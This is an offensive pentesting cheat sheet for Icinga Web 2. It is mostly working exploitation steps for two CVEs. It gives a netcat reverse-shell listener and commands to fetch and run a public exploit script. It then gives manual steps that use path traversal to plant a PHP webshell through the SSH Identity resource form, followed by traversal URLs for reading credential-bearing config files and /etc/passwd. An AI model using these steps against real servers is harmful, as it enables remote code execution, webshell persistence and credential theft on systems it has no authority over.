# Icinga Web Pentesting

### Remote Code Execution (CVE-2022-24715) <a href="#remote-code-execution-cve-2022-24715" id="remote-code-execution-cve-2022-24715"></a>

Authenticated user can execute arbitrary code.

#### Automation <a href="#automation" id="automation"></a>

[This repository](https://github.com/JacobEbben/CVE-2022-24715) is available for reverse shell automatically.

In local machine, start a listener.

```shellscript
nc -lvnp 4444
```

Next create a PEM file and download the script, then execute it.

```shellscript
ssh-keygen -m pem
# Location: cert.pem
# Passphrase: (empty)

wget https://github.com/JacobEbben/CVE-2022-24715/blob/main/exploit.py
python3 exploit.py -t http://example.com/icingaweb2/ -I <local-ip> -P 4444 -u username -p password -e cert.pem
```

#### Manual Exploitation <a href="#manual-exploitation" id="manual-exploitation"></a>

\*This content may not be working due to not enough verification.

1. Prepare Pem private key in local machine.

   ```shellscript
   ssh-keygen -m pem
   # Location cert.pem
   # Passphrase: (empty)
   ```
2. Login Icinga Web 2 and enter dashboard.
3. Go to Configuration → Application → Resources.
4. Click “Create a New Resource”.
5. In New Resource Window, select Resource Type “SSH Identity”.
6. Fill other field. For example,

   ```shellscript
   [Resource Name]
   evil

   [User]
   ../../../../../../../../../../../dev/shm/run.php

   [Private Key]
   <PEM_PRIVATE_KEY>
   \x00<?php system($_REQUEST["cmd"]);?>
   ```

   Regarding the Private Key field, copy the content of the PEM file we’ve generated and paste it, then followed by newline, “\x00” and PHP webshell code.
7. Click Save Resource.

### Arbitrary File Disclosure (CVE-2022-24716) <a href="#arbitrary-file-disclosure-cve-2022-24716" id="arbitrary-file-disclosure-cve-2022-24716"></a>

Unauthenticated user can read arbitrary files.\
Assume the Icinga Web’s root directory is **`/icingaweb2`**.

```shellscript
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/authentication.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/config.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/resources.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/icingaweb2/roles.ini
/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd
```

Also we can [this script](https://github.com/JacobEbben/CVE-2022-24716) for automatically.

### References <a href="#references" id="references"></a>

* [SonarSource](https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/)